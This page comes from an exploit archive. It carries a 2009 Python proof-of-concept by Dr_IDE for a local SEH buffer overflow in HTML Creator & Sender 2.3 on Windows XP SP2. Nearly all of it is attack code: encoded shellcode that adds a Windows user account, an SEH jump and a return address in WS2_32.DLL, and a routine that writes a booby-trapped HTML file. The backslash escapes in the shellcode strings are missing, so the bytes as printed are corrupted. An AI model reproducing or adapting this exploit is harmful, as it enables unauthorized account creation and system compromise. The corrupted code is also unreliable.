HTML Creator & Sender <= 2.3 build 697 Local BOF Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HTML Creator & Sender <= 2.3 build 697 Local BOF Exploit (SEH)
# Published : 2009-08-28
# Author : Dr_IDE
# Previous Title : PIPL <= 2.5.0 (.m3u File) Universal Buffer Overflow Exploit (SEH)
# Next Title : Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit

#!/usr/bin/env python

#############################################################################
#
# HTML Creator & Sender <= v2.3 Build 697 Local Buffer Overflow Exploit (SEH)
# Coded By:     Dr_IDE
# Based On:     http://www.milw0rm.com/exploits/9446
# Testd On:	Windows XP SP2
# Download:     http://www.html-email.net/
# Usage:        Browse to file, enter anything for From and To, Send Email.
#
#############################################################################

import struct

# windows/adduser USER=Dr_IDE PASS=Dr_IDE
# x86/alpha_upper succeeded with size 475 (iteration=1)
# badchars = "x00x0ax0dx20xff" at least, Bind Shell was
# not working for me, there are still some unidentified bad chars.

sc = (
"x89xe1xdbxdfxd9x71xf4x59x49x49x49x49x49x43x43"
"x43x43x43x43x51x5ax56x54x58x33x30x56x58x34x41"
"x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42"
"x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50"
"x38x41x43x4ax4ax49x4bx4cx4bx58x51x54x43x30x43"
"x30x43x30x4cx4bx51x55x47x4cx4cx4bx43x4cx45x55"
"x42x58x43x31x4ax4fx4cx4bx50x4fx45x48x4cx4bx51"
"x4fx51x30x45x51x4ax4bx50x49x4cx4bx46x54x4cx4b"
"x45x51x4ax4ex46x51x49x50x4cx59x4ex4cx4cx44x49"
"x50x42x54x44x47x49x51x49x5ax44x4dx45x51x49x52"
"x4ax4bx4ax54x47x4bx50x54x46x44x44x44x44x35x4d"
"x35x4cx4bx51x4fx47x54x45x51x4ax4bx43x56x4cx4b"
"x44x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c"
"x4bx45x4cx4cx4bx43x31x4ax4bx4bx39x51x4cx51x34"
"x44x44x49x53x51x4fx46x51x4cx36x43x50x51x46x42"
"x44x4cx4bx50x46x50x30x4cx4bx47x30x44x4cx4cx4b"
"x44x30x45x4cx4ex4dx4cx4bx45x38x45x58x4cx49x4a"
"x58x4dx53x49x50x43x5ax50x50x43x58x4ax50x4dx5a"
"x43x34x51x4fx45x38x4dx48x4bx4ex4cx4ax44x4ex51"
"x47x4bx4fx4dx37x42x43x42x4dx43x54x46x4ex42x45"
"x43x48x43x55x47x50x46x4fx43x53x47x50x42x4ex43"
"x55x44x34x47x50x43x45x42x53x43x55x44x32x47x50"
"x50x44x42x52x51x4fx50x49x50x44x47x35x47x50x51"
"x54x44x32x51x4fx51x59x51x54x47x35x51x30x46x4f"
"x47x31x47x34x51x54x47x50x46x46x51x36x51x30x42"
"x4ex45x35x43x44x47x50x42x4cx42x4fx45x33x45x31"
"x42x4cx45x37x44x32x42x4fx43x45x44x30x51x30x51"
"x51x43x54x42x4dx43x59x42x4ex45x39x44x33x43x44"
"x43x42x45x31x43x44x42x4fx42x52x44x33x47x50x50"
"x44x44x32x51x4fx47x39x47x34x47x35x47x50x46x4f"
"x47x31x50x44x47x34x43x30x45x5ax41x41")

jump = ("xEBx06x90x90")
junk = ("x43" * (4616 - len(sc)))
retn = ("xFAx89xABx71") #WS2_32.DLL XPSP2
nops = ("x90" * 8)

# Don't mess with the headers, we need to create a valid HTML file
header1 =  ("<HTML>n<HEAD>n</HEAD>n<BODY>n<img src = "")
payload =  ("x41" * 56 + jump + retn + nops + sc + junk)
header2 =  ("">n</BODY>n</HTML>n")

try:
    f1 = open("Dr_IDE-Evil.html","w")
    f1.write(header1 + payload + header2)
    f1.close()
    print("nExploit file created!n")
except:
    print ("Error")

# www.Syue.com [2009-08-28]